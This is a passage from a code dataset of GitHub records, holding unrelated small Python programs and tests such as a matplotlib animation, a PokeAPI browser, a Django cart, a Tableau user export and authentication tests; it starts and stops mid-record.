\"../Futrue/每日咨询相关股.xlsx\"\nx_column = '行业'  # Assuming the column name is 'C', if it's a different name, replace it with the actual column name.\ny_column = '数量'  # Assuming the column name is 'B', if it's a different name, replace it with the actual column name.\n\nprocess_excel_data(file_path, x_column, y_column)","repo_name":"Create-your-name/Quantitative_stocks","sub_path":"Util/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"38613953845","text":"import numpy as np\nimport matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.animation as animation\nimport re\nfrom math import *\nfrom track_utils import TrackingAnalysis\nfrom os.path import join\n\ndef update_scatter(num, track, points, line, frame_ini, mov):\n    print('frame->'+str(num))\n    x, y, z = track.getAllPositions(num+frame_ini+1, filtered = False)\n    points._offsets3d = (x, y, z)\n\n    line.set_data(mov[1, :num], mov[2, :num])\n    line.set_3d_properties(mov[3,:num])\n\n    return points, line\n\ndef main(*args):\n\n    date = \"2015_6_22_15_33_43\"\n    frame_ini = 1\n    frame_end = 20\n    back = True\n    if len(args) == 3:\n        frame_ini = int(args[0])\n        frame_end = int(args[1])\n        date = str(args[2])\n    elif len(args) > 3:\n        if (args[3].lower() == 'false') or (str(args[3]) == '0'):\n            back = False\n\n    min_frames = 5\n\n    # Define filenames\n    ini_config = readConfigFile(join('ini_files', 'ini_config.ini'))\n    results_folder = ini_config['results_folder']\n    folder = join(results_folder,\"GMEMtracking3D_\" + date)\n\n    # read positions and apply filter\n    track = TrackingAnalysis(folder)\n    track.minFrameFilter(min_frames)\n\n    x, y, z = track.getAllPositions(frame_ini, filtered = False)\n    \n    # mov is an array (4, time), where 4 is:\n    # 0 -> frame, 1-3 -> x,y,z\n    mov = np.asarray(track.getWholeMovement(track.index_filter[0]))\n\n    # set up figure\n    fig = plt.figure()\n    ax = fig.add_subplot(111, projection='3d')\n    points = ax.scatter(x, y, z, animated=True)\n    line, = ax.plot(mov[1, 0:1], mov[2, 0:1], mov[3, 0:1])\n    ani = animation.FuncAnimation(fig, update_scatter, frames=frame_end-frame_ini, fargs = (track, points, line, frame_ini, mov),\n                                  interval=20, blit=False)\n\n    FFMpegWriter = animation.writers['ffmpeg']\n    metadata = dict(title='Movie Test', artist='Matplotlib',\n                    comment='Moving cells')\n    writer = FFMpegWriter(fps=5, metadata=metadata)\n    ani.save('basic_animation.mp4', writer=writer)\n\nif __name__ == \"__main__\":\n    import sys\n    main(*sys.argv[1:])","repo_name":"epolimpio/image_extraction","sub_path":"scatter_animation.py","file_name":"scatter_animation.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"73161253335","text":"class node:\n    def __init__(self,data,next = None ):\n        self.data = data\n        self.next = next\n    def __str__(self):\n        last=self\n        while (last.next is not None):\n            print(last.data,end=\" \")\n            last=last.next\n        print(last.data,end=\" \")\n        return \"\"\ndef createList(l=[]):\n    for i in 
range(len(l)):\n if i == 0:\n headnode=node(l[i])\n last=headnode\n else :\n newnode=node(l[i])\n last.next=newnode\n last=last.next\n return headnode\n\ndef printList(H):\n print(H)\n\ndef mergeOrderesList(p,q):\n lastp=p\n lastq=q\n if lastp.data>lastq.data:\n headnode=node(lastq.data)\n lastm=headnode\n lastq=lastq.next\n else :\n headnode=node(lastp.data)\n lastm=headnode\n lastp=lastp.next\n \n while True:\n if lastp is None and lastq is None:\n return headnode\n elif lastp is None:\n newnode=node(lastq.data)\n lastq=lastq.next\n lastm.next=newnode\n lastm=lastm.next\n elif lastq is None:\n newnode=node(lastp.data)\n lastp=lastp.next\n lastm.next=newnode\n lastm=lastm.next\n elif int(lastp.data)>int(lastq.data):\n newnode=node(lastq.data)\n lastq=lastq.next\n lastm.next=newnode\n lastm=lastm.next\n else :\n newnode=node(lastp.data)\n lastp=lastp.next\n lastm.next=newnode\n lastm=lastm.next\n\n\nif __name__==\"__main__\":\n inp = input(\"Enter 2 Lists : \").split(\" \")\n L1=inp[0].split(\",\")\n L2=inp[1].split(\",\")\n #################### FIX comand #################### \n # input only a number save in L1,L2\n LL1 = createList(L1)\n LL2 = createList(L2)\n print('LL1 : ',end='')\n printList(LL1)\n print('LL2 : ',end='')\n printList(LL2)\n m = mergeOrderesList(LL1,LL2)\n print('Merge Result : ',end='')\n printList(m)","repo_name":"maimoke/DATA-STRUCTURES-AND-ALGORITHM","sub_path":"code/63010177_Lab5_3.py","file_name":"63010177_Lab5_3.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35682109392","text":"# Using univariate histogram plot\n\nfrom matplotlib import pyplot as plt\nimport pandas\n\nfilename = 'indians-diabetes.data.csv'\n\nhnames = [ 'preg' , 'plas' , 'pres' , 'skin' , 'test' , 'mass' , 'pedi' , 'age' ,'class']\n\ndf = pandas.read_csv(filename , names=hnames)\nprint(type(df))\n\ndf.hist() # To create histogram to understand the pattern of data\n\nplt.show()\n","repo_name":"EnigmaVSSUT/Hacktoberfest2019","sub_path":"Python/MLAlgos/ML19.py","file_name":"ML19.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"68"} +{"seq_id":"23489993615","text":"import requests \n\ndef opciones():\n r = int(input('\\n¿Desea regresar a la pantalla principal? 
1) Sí 2) No : '))\n if r==1:\n interfaz()\n else:\n print('\\nMuchas gracias por usar nuestro aplicativo')\n\ndef interfaz():\n print('\\nQUIÉN ES ESE POKEMON - MODULO 1 - BACK END - SILABUZ')\n print('Creadores: Jhonatan Panta | Kelly Romero')\n print('\\nSeleccione la opción de la búsqueda que desea realizar:')\n print('\\nOpción 1) Búsqueda por Generación\\nOpción 2) Búsqueda por forma\\nOpción 3) Búsqueda por habilidad\\nOpción 4) Búsqueda por Hábitat\\nOpción 5) Búsqueda por Tipo')\n op = int(input('Ingrese el número de la opción elegida: '))\n if op == 1:\n print('\\n:: LISTADO DE POKEMONES POR GENERACIÓN ::')\n pokemon_generacion()\n elif op == 2:\n print('\\n:: LISTADO DE POKEMONES POR FORMA ::')\n pokemon_forma()\n elif op == 3:\n print('\\n:: LISTADO DE POKEMONES POR HABILIDADES ::')\n pokemon_habilidades()\n elif op == 4:\n print('\\n:: LISTADO DE POKEMONES POR HABITAT ::')\n pokemon_habitat()\n elif op == 5:\n print('\\n:: LISTADO DE POKEMONES POR TIPO ::')\n pokemon_tipo()\n else:\n opciones()\n\ndef pokemon_generacion():\n try:\n print('\\nSeleccione la generación que desea listar')\n r = int(input('Ingrese de la 1era a la 8va generación: '))\n url = \"https://pokeapi.co/api/v2/generation/\"+str(r)+\"/\"\n r = requests.get(url)\n data = r.json()\n\n for indice, elemento in enumerate (data['pokemon_species']):\n print(indice+1,'->','Nombre: ',elemento['name'],'| URL: ', elemento['url'])\n except:\n print('Ocurrió un error, por favor inténtelo denuevo')\n finally:\n opciones()\n\ndef pokemon_habitat():\n try:\n print('Seleccione el habitat que desea listar\\nOpción 1) Cave\\nOpción 2) Forest\\nOpción 3) Grassland\\nOpción 4) Mountain\\nOpción 5) Rare\\nOpción 6) Rough-terrain\\nOpción 7) Sea\\nOpción 8) Urban\\nOpción 9) Waters-edge')\n r = int(input('Ingrese el número de opción elegida: '))\n url = \"https://pokeapi.co/api/v2/pokemon-habitat/\"+str(r)+\"/\"\n print('\\n == RESULTADOS DE BÚSQUEDA ==\\n') \n r = requests.get(url)\n data = r.json()\n for indice, elemento in enumerate (data['pokemon_species']):\n print(indice+1,'->','Nombre: ',elemento['name'],'| URL: ', elemento['url'])\n except:\n print('Ocurrió un error, por favor inténtelo denuevo')\n finally: \n opciones()\n\ndef pokemon_tipo():\n try:\n url_opc = 'https://pokeapi.co/api/v2/type'\n data_opc = requests.get(url_opc).json()\n print('Seleccione el habitat que desea listar')\n for ind, elem in enumerate (data_opc['results']):\n print('Opción',ind+1,\")\",elem['name'])\n num = int(input('Ingrese el número de la opción elegida: '))\n print('\\n == RESULTADOS DE BÚSQUEDA ==\\n')\n url = \"https://pokeapi.co/api/v2/type/\"+str(num)+\"/\"\n r = requests.get(url)\n data = r.json()\n for indice, elemento in enumerate (data['pokemon']):\n print(indice+1,'->',elemento['pokemon']['name'], \"| URL: \",elemento['pokemon']['url'] )\n except:\n print('Ocurrió un error, por favor inténtelo denuevo')\n finally: \n opciones()\n\ndef pokemon_habilidades():\n try:\n url_opc = 'https://pokeapi.co/api/v2/ability/?offset=0&limit=267'\n data_opc = requests.get(url_opc).json()\n print('Seleccione la habilidad que desea listar')\n for ind, elem in enumerate (data_opc['results']):\n print('Opción',ind+1,\")\",elem['name'])\n num = int(input('Seleecione la opción que desea listar: '))\n print('\\n == RESULTADOS DE BÚSQUEDA ==\\n')\n url = \"https://pokeapi.co/api/v2/ability/\"+str(num)+\"/\"\n r = requests.get(url)\n data = r.json()\n for indice, elemento in enumerate (data['pokemon']):\n print(indice+1,'->',elemento['pokemon']['name'], \"| 
URL: \",elemento['pokemon']['url'] )\n except:\n print('Ocurrió un error, por favor inténtelo denuevo')\n finally:\n opciones()\n\ndef pokemon_forma():\n try:\n url_opc = 'https://pokeapi.co/api/v2/pokemon-form/?offset=0&limit=1323'\n data_opc = requests.get(url_opc).json()\n print('Seleccione la forma del pokemon que desea listar')\n for ind, elem in enumerate (data_opc['results']):\n print('Opción',ind+1,\")\",elem['name'])\n num = int(input('Seleecione la opción que desea listar: '))\n if num>905:\n num += 9095\n print('\\n == RESULTADOS DE BÚSQUEDA ==\\n') \n url = \"https://pokeapi.co/api/v2/pokemon-form/\"+str(num)+\"/\"\n r = requests.get(url)\n data = r.json()\n print('Pokemon :',data['pokemon']['name'])\n print('Nombre de forma : ',data['form_name'])\n print('Tipos : ',end=\"\")\n for i in data['types']:\n print(i['type']['name'],end=\" | \")\n except:\n print('Ocurrió un error, por favor inténtelo denuevo')\n finally:\n opciones()\n\ninterfaz()","repo_name":"jhonatan0710/Trabajo-M1-BE-Silabuz","sub_path":"tarea2.py","file_name":"tarea2.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18588407555","text":"import gzip\nimport json\nfrom tempfile import NamedTemporaryFile\nfrom unittest.mock import patch\n\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom rest_framework import status\n\nfrom api.openapi.view import get_api_json\n\n\ndef get_api_json_error(path):\n \"\"\"Raise error for mocked response.\"\"\"\n raise FileNotFoundError()\n\n\nclass OpenAPIViewTest(TestCase):\n \"\"\"Tests the openapi view.\"\"\"\n\n @patch('api.openapi.view.get_api_json', return_value=json.dumps({}))\n def test_openapi_endpoint(self, mock_get_json):\n \"\"\"Test the openapi endpoint.\"\"\"\n url = reverse('openapi')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n mock_get_json.assert_called_once()\n\n @patch('api.openapi.view.get_api_json', side_effect=get_api_json_error)\n def test_openapi_endpoint_failure(self, mock_get_json):\n \"\"\"Test the openapi endpoint.\"\"\"\n url = reverse('openapi')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n mock_get_json.assert_called_once()\n\n def test_get_api_json(self):\n \"\"\"Test the get_api_json method.\"\"\"\n test_file = NamedTemporaryFile(delete=False)\n json_data = {'foo': 'bar'}\n gzip_data = gzip.compress(json.dumps(json_data).encode())\n test_file.write(gzip_data)\n test_file.close()\n result = get_api_json(test_file.name)\n self.assertEqual(result, json_data)\n","repo_name":"werwty/koku","sub_path":"koku/api/openapi/tests_openapi.py","file_name":"tests_openapi.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"68"} +{"seq_id":"6356727328","text":"import sys\ninput = sys.stdin.readline\n\nk, n = map(int, input().split())\nlan = [int(input()) for _ in range(k)]\nstart, end = 1, max(lan)\nwhile(start <= end):\n mid = (start + end) // 2 # 자를 선 길이\n cnt = 0 # 몇 개 자를 수 있는 지\n for l in lan:\n cnt += l // mid\n if cnt < n:\n end = mid - 1\n else:\n start = mid + 1\n\nprint(end)","repo_name":"psun0610/TIL","sub_path":"Algorithm/BOJ_1654_랜선자르기.py","file_name":"BOJ_1654_랜선자르기.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"ko","doc_type":"code","stars":11,"dataset":"github-code","pt":"68"} 
+{"seq_id":"23908659406","text":"import math\nimport random\nfrom cminer.consts import COIN\n\n\nclass MineType:\n def __init__(self, uid, hardness, probs, item_drop_probs,\n hp_base, coin_factor):\n self.uid = uid\n self.hardness = hardness\n self.probs = probs\n # [(MATERIAL_IRON, 2, 0.4), ...], <= [(id, num, prob)]\n self.item_drop_probs = item_drop_probs\n self.hp_base = hp_base\n self.coin_factor = coin_factor\n\n def prob_at_level(self, level):\n pos = math.floor(level / 100)\n return self.probs[min(pos, len(self.coin_factor) - 1)] or 0\n\n def hp_at_level(self, level):\n factor = random.uniform(0.9, 1.1)\n rv = 1.05 ** (level / 10) * self.hp_base * factor\n return int(rv)\n\n def _coin_at_level(self, level):\n pos = math.floor(level / 100)\n factor = self.coin_factor[min(pos, len(self.coin_factor) - 1)]\n rv = factor * self.hp_at_level(level)\n return int(rv)\n\n def award_at_level(self, level, lucky):\n rv = dict()\n for item in self.item_drop_probs:\n if random.random() > item[2] + lucky:\n continue\n if rv.get(item[0]):\n rv[item[0]] += item[1]\n else:\n rv[item[0]] = item[1]\n coins = self._coin_at_level(level=level)\n # 40% probability drop 10% more coin\n if random.random() < 0.4 + lucky:\n coins = int(coins * 1.1)\n rv[COIN] = coins\n return rv\n\n def new(self, level, lucky):\n return Mine(self, level, lucky)\n\n\nclass MineStatus:\n def __init__(self, hp):\n self.hp = hp\n self.hp_now = hp\n\n\nclass Mine:\n def __init__(self, model, level, lucky):\n self.model = model\n self.award = model.award_at_level(level, lucky)\n hp = model.hp_at_level(level)\n self.status = MineStatus(hp)\n\n def __repr__(self):\n from cminer.system import System\n return System.i18n(self.model.uid)\n","repo_name":"monk-studio/cminer-profiler","sub_path":"cminer/models/mine.py","file_name":"mine.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6591614982","text":"import tensorflow as tf\ntf.get_logger().setLevel('ERROR') # only show error messages\n\nfrom recommenders.models.ncf.dataset import Dataset as NCFDataset\nfrom recommenders.datasets import movielens\nfrom recommenders.datasets.python_splitters import python_chrono_split\n\n\n\n\n# top k items to recommend\nTOP_K = 10\n\n# Select MovieLens data size: 100k, 1m, 10m, or 20m\nMOVIELENS_DATA_SIZE = '100k'\n\n# Model parameters\nEPOCHS = 100\nBATCH_SIZE = 256\n\nSEED = None\n\n\ndf = movielens.load_pandas_df(\n size=MOVIELENS_DATA_SIZE,\n header=[\"userID\", \"itemID\", \"rating\", \"timestamp\"]\n)\n\ndf.head()\n\n\ntrain, test = python_chrono_split(df, 0.75)\n\ntest = test[test[\"userID\"].isin(train[\"userID\"].unique())]\ntest = test[test[\"itemID\"].isin(train[\"itemID\"].unique())]\n\n\nleave_one_out_test = test.groupby(\"userID\").last().reset_index()\n\n\ntrain_file = \"./train.csv\"\ntest_file = \"./test.csv\"\nleave_one_out_test_file = \"./leave_one_out_test.csv\"\ntrain.to_csv(train_file, index=False)\ntest.to_csv(test_file, index=False)\nleave_one_out_test.to_csv(leave_one_out_test_file, index=False)\n\ndata = NCFDataset(train_file=train_file, test_file=leave_one_out_test_file, seed=SEED, overwrite_test_file_full=True)","repo_name":"SadovnikI/Recommender_project","sub_path":"recomendation_workers/NCF/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10735710582","text":"# 
https://leetcode.com/problems/construct-binary-tree-from-inorder-and-postorder-traversal/\n# Given inorder and postorder traversal of a tree, construct the binary tree.\n#\n# Note:\n# You may assume that duplicates do not exist in the tree.\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution(object):\n    def buildTree(self, inorder, postorder):\n        \"\"\"\n        :type inorder: List[int]\n        :type postorder: List[int]\n        :rtype: TreeNode\n        \"\"\"\n        self.postorder = postorder[:]\n        self.inorder = inorder[:]\n        root = self.InPostOrder(0, len(inorder), 0, len(postorder))\n        return root\n\n    def InPostOrder(self, inLeft, inRight, postLeft, postRight):\n        if inLeft == inRight or postLeft == postRight:\n            return None\n        rootVal = self.postorder[postRight - 1]\n        root = TreeNode(rootVal)\n        leftSize = self.inorder.index(rootVal) - inLeft\n        rightSize = (inRight - inLeft) - leftSize - 1\n        root.left = self.InPostOrder(inLeft, inLeft + leftSize, postLeft, postLeft + leftSize)\n        root.right = self.InPostOrder(inLeft + leftSize + 1, inRight, postLeft + leftSize, postRight - 1)\n        return root\n","repo_name":"rainzhop/cumulus-tank","sub_path":"leetcode/medium/construct-binary-tree-from-inorder-and-postorder-traversal.py","file_name":"construct-binary-tree-from-inorder-and-postorder-traversal.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71654427689","text":"import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\ncolorspacelist = [i for i in dir(cv2) if i.startswith('COLOR_')]\r\nprint (colorspacelist)\r\n\r\nimgsrc = cv2.imread('resource/pitrain3.png', cv2.IMREAD_UNCHANGED)\r\ngrayimg = cv2.cvtColor(imgsrc, cv2.COLOR_BGR2GRAY)\r\ncv2.imshow('unchanged', imgsrc)\r\ncv2.waitKey(0)\r\ncv2.imshow('gray', grayimg)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"JeisyLiu/Repository_Charlie","sub_path":"VariousFeatures/ComputerVision/convertColor.py","file_name":"convertColor.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7959165313","text":"import tableauserverclient as TSC\nimport csv\n\nserver_url = 'https://dub01.online.tableau.com'\nPAT_name = 'RestAPI-UserManagementScript'\nPAT_value = ''\nsite_name = 'tablonian'\ncsv_path = './users.csv'\n\nserver = TSC.Server(server_url, use_server_version=True)\ntableau_auth = TSC.PersonalAccessTokenAuth(PAT_name, PAT_value, site_name)\n\nprint(\"Collecting the list of users...\")\nwith server.auth.sign_in(tableau_auth):\n    all_users, pagination_item = server.users.get()\n    print(\"\\nWriting {} users to file: \".format(pagination_item.total_available))\n    #debug output\n    #print([[user.name,user.site_role] for user in all_users])\n\n    #write data to csv\n    with open(csv_path, 'w') as f:\n        writer = csv.writer(f)\n        writer.writerow(['id','Username','SiteRole'])\n        for user in all_users:\n            writer.writerow([user.id,user.name,user.site_role])\n\nprint(\"\\nSuccess\\nEnd of script\")\n","repo_name":"TheFluffyPanda/tableau-api-helpers","sub_path":"DownloadUserInfo.py","file_name":"DownloadUserInfo.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22370186648","text":"from firebolt.client.auth import Auth\nfrom firebolt.service.manager import 
ResourceManager\n\n\ndef test_database_get_default_engine(\n auth: Auth,\n account_name: str,\n api_endpoint: str,\n database_name: str,\n stopped_engine_name: str,\n engine_name: str,\n):\n \"\"\"\n Checks that the default engine is either running or stopped engine\n \"\"\"\n rm = ResourceManager(\n auth=auth, account_name=account_name, api_endpoint=api_endpoint\n )\n\n db = rm.databases.get(database_name)\n\n engine = db.get_attached_engines()[0]\n assert engine is not None, \"engine is None, but shouldn't be\"\n assert engine.name in [\n stopped_engine_name,\n engine_name,\n ], \"Returned default engine name is neither of known engines\"\n\n\ndef test_databases_get_many(\n auth: Auth,\n account_name: str,\n api_endpoint: str,\n database_name: str,\n engine_name: str,\n):\n rm = ResourceManager(\n auth=auth, account_name=account_name, api_endpoint=api_endpoint\n )\n\n # get all databases, at least one should be returned\n databases = rm.databases.get_many()\n assert len(databases) > 0\n assert database_name in {db.name for db in databases}\n\n # get all databases, with name_contains\n databases = rm.databases.get_many(name_contains=database_name)\n assert len(databases) > 0\n assert database_name in {db.name for db in databases}\n\n # get all databases, with name_contains\n databases = rm.databases.get_many(attached_engine_name_eq=engine_name)\n assert len(databases) > 0\n assert database_name in {db.name for db in databases}\n\n # get all databases, with name_contains\n databases = rm.databases.get_many(attached_engine_name_contains=engine_name)\n assert len(databases) > 0\n assert database_name in {db.name for db in databases}\n\n region = [db for db in databases if db.name == database_name][0].region\n\n # get all databases, with region_eq\n databases = rm.databases.get_many(region_eq=region)\n assert len(databases) > 0\n assert database_name in {db.name for db in databases}\n\n # get all databases, with all filters\n databases = rm.databases.get_many(\n name_contains=database_name,\n attached_engine_name_eq=engine_name,\n attached_engine_name_contains=engine_name,\n region_eq=region,\n )\n assert len(databases) > 0\n assert database_name in {db.name for db in databases}\n","repo_name":"firebolt-db/firebolt-python-sdk","sub_path":"tests/integration/resource_manager/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"9289155006","text":"from django.conf import settings\nfrom main.models import Product\nfrom django.db import models\n\nclass Cart(models.Model):\n def __init__(self, req):\n self.session = req.session\n cart=self.session.get(settings.CART_SESSION_ID)\n\n if not cart:\n cart=self.session[settings.CART_SESSION_ID] = {}\n\n self.cart = cart\n\n def __iter__(self):\n for p in self.cart.keys():\n self.cart[str(p)]['product'] = Product.objects.get(id=p)\n\n for item in self.cart.values():\n item['total_price'] = int(item['product'].price * item['quantity'])\n yield item\n \n def __len__(self):\n if sum(item['quantity'] for item in self.cart.values()) >= 0:\n return sum(item['quantity'] for item in self.cart.values())\n else: return 0\n \n def save(self):\n self.session[settings.CART_SESSION_ID] = self.cart\n self.session.modified=True\n\n def add(self, product_id, quantity=1, update_quantity=False):\n product_id=product_id\n if product_id not in self.cart:\n self.cart[product_id] = {'quantity': int(quantity), 'id':product_id}\n \n 
if update_quantity:\n self.cart[product_id]['quantity'] += int(quantity)\n\n if self.cart[product_id]['quantity'] == 0:\n self.remove(product_id)\n\n self.save()\n\n def remove(self, product_id):\n if product_id in self.cart:\n del self.cart[product_id]\n self.save()\n\n def gettotalcost(self):\n for p in self.cart.keys():\n self.cart[str(p)]['product'] = Product.objects.get(id=p)\n cost=int(sum((item['product'].price - item['product'].sale_price) * item['quantity'] for item in self.cart.values()))\n if cost >= 0:\n return cost\n else:\n return 0\n def getquantity(self):\n for p in self.cart.keys():\n self.cart[str(p)]['product'] = Product.objects.get(id=p)\n if int(sum(item['quantity'] for item in self.cart.values())) >=0:\n return int(sum(item['quantity'] for item in self.cart.values()))\n else:\n return 0","repo_name":"yousefshady/finalprojectamit","sub_path":"ecommerce/cart/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42254241626","text":"from maestro_api.services.auth.request_validator import (\n AuthRequestValidator,\n UnauthorizedAccessError,\n ExpiredAccessTokenError,\n)\n\n\nclass TestRequestValidator:\n def test_validate_auth_header(self):\n auth_header = \"Bearer test_token\"\n auth_api_token = \"test_token\"\n\n re_validator = AuthRequestValidator()\n\n user = re_validator.validate_auth_header(auth_header, auth_api_token)\n\n assert dict(scope=None, email=None, uuid=\"maestro\") == user\n\n def test_validate_auth_header_with_exception(self):\n\n auth_header = \"Bearer invalid_token\"\n auth_api_token = \"test_token\"\n\n re_validator = AuthRequestValidator()\n\n try:\n re_validator.validate_auth_header(auth_header, auth_api_token)\n raise AssertionError(\"UnauthorizedAccessError should be thrown\")\n except UnauthorizedAccessError as e:\n assert {\"description\": \"Maestro Agent token is not valid\"} == e.error_msg\n\n def test_validate_tokens(self, mocker):\n access_token = \"test_access_token\"\n refresh_token = \"test_refresh_token\"\n\n class JWTAuthorizationMock:\n def validate_token(self, token):\n assert access_token == token\n\n return {\n \"scope\": \"test_scope\",\n \"email\": \"test_email\",\n \"uuid\": \"test_uuid\",\n }\n\n mocker.patch(\n \"maestro_api.services.auth.authorization.JWTAuthorization.instance\",\n return_value=JWTAuthorizationMock(),\n )\n\n re_validator = AuthRequestValidator()\n\n auth_data = re_validator.validate_tokens(access_token, refresh_token)\n\n assert {\n \"user\": dict(\n scope=\"test_scope\",\n email=\"test_email\",\n uuid=\"test_uuid\",\n ),\n \"update_tokens\": False,\n \"access_token\": access_token,\n \"refresh_token\": refresh_token,\n } == auth_data\n\n def test_validate_tokens_with_token_refresh(self, mocker):\n access_token = \"test_access_token\"\n refresh_token = \"test_refresh_token\"\n\n class OauthClientMock:\n def make_token_refresh(self, refresh_token):\n assert \"test_refresh_token\" == refresh_token\n\n return {\n \"access_token\": \"new_access_token\",\n \"refresh_token\": \"new_refresh_token\",\n }\n\n class JWTAuthorizationMock:\n called = 0\n\n def validate_token(self, token):\n self.called += 1\n if self.called == 1:\n raise ExpiredAccessTokenError(\"Token is expired\")\n elif self.called == 2:\n return {\n \"scope\": \"test_scope\",\n \"email\": \"test_email\",\n \"uuid\": \"test_uuid\",\n }\n raise AssertionError(\"should not be called more than 2 times\")\n\n mocker.patch(\n (\n 
\"maestro_api.services.auth.request_validator\"\n \".AuthRequestValidator.create_oauth_client\"\n ),\n return_value=OauthClientMock(),\n )\n mocker.patch(\n \"maestro_api.services.auth.authorization.JWTAuthorization.instance\",\n return_value=JWTAuthorizationMock(),\n )\n\n re_validator = AuthRequestValidator()\n\n auth_data = re_validator.validate_tokens(access_token, refresh_token)\n\n assert {\n \"user\": dict(\n scope=\"test_scope\",\n email=\"test_email\",\n uuid=\"test_uuid\",\n ),\n \"update_tokens\": True,\n \"access_token\": \"new_access_token\",\n \"refresh_token\": \"new_refresh_token\",\n } == auth_data\n\n def test_validate_tokens_with_whitelisted_email(self, mocker):\n access_token = \"test_access_token\"\n refresh_token = \"test_refresh_token\"\n\n class JWTAuthorizationMock:\n def validate_token(self, token):\n assert access_token == token\n\n return {\n \"scope\": \"test_scope\",\n \"email\": \"test_email\",\n \"uuid\": \"test_uuid\",\n }\n\n mocker.patch(\n \"maestro_api.services.auth.authorization.JWTAuthorization.instance\",\n return_value=JWTAuthorizationMock(),\n )\n\n re_validator = AuthRequestValidator()\n re_validator.emails_whitelist = [\"some_other_email\"]\n\n try:\n re_validator.validate_tokens(access_token, refresh_token)\n raise AssertionError(\"UnauthorizedAccessError should be thrown\")\n except UnauthorizedAccessError as e:\n assert {\"description\": \"User test_email doesn't have access\"} == e.error_msg\n","repo_name":"Farfetch/maestro","sub_path":"web/api/tests/services/auth/test_request_validator.py","file_name":"test_request_validator.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"18977593554","text":"#Andrew Anstaett\n#CNN Web Crawler in Python\n\nfrom bs4 import BeautifulSoup\nimport urllib2\n\n\n\ndef getSoup(url):\n\t#requests html from website\n\thtml = urllib2.urlopen(url).read()\n\t#makes it into a BeautifulSoup datatype that we can use to parse out the infomation needed\n\tsoup = BeautifulSoup(html)\n\t#returns it to 'main'\n\treturn soup\n\ndef pullArticles(soup,category):\n\t#for all the unordered lists\n\t#the categories are seperated into diffrent unordered lists, so we seperate them\n\t#and find the ones we are looking for\n\tfor ul in soup.find_all('ul'):\n\t\t#h2 is the title of the category\n\t\tfor h2 in ul.children:\n\t\t\t#we find the category we are looking for\n\t\t\tif(h2.text == category):\n\t\t\t\t#cnn uses the class 'cd__headline-text' for the headline articles titles\n\t\t\t\t#we look for all the headline titles\n\t\t\t\tfor span in ul.select(\".cd__headline-text\"):\n\t\t\t\t\t#we print the titles\n\t\t\t\t\tprint(\"\\t\" + span.text)\n\n\n\n\n#'main'\ncnn = getSoup(\"http://www.cnn.com\")\n\nprint(\"Top Stories:\")\npullArticles(cnn,\"Top Stories\")\n\nprint(\"\\n\\n\")\n\nprint(\"News and Buzz:\")\npullArticles(cnn,\"News and Buzz\")\n\nprint(\"\\n\\n\")\n\nprint(\"Sports:\")\npullArticles(cnn,\"Sports\")\n\nprint(\"\\n\\n\")\n","repo_name":"AAnstaett/PythonWebCrawler","sub_path":"WebCrawler.py","file_name":"WebCrawler.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23925399324","text":"import filecmp\nimport shlex\nimport tempfile\nfrom inspect import getmembers\nfrom typing import Any, Dict\n\nimport psutil\nimport pytest\nimport subprocess\nimport os\nimport re\nimport shutil\nimport sys\nimport 
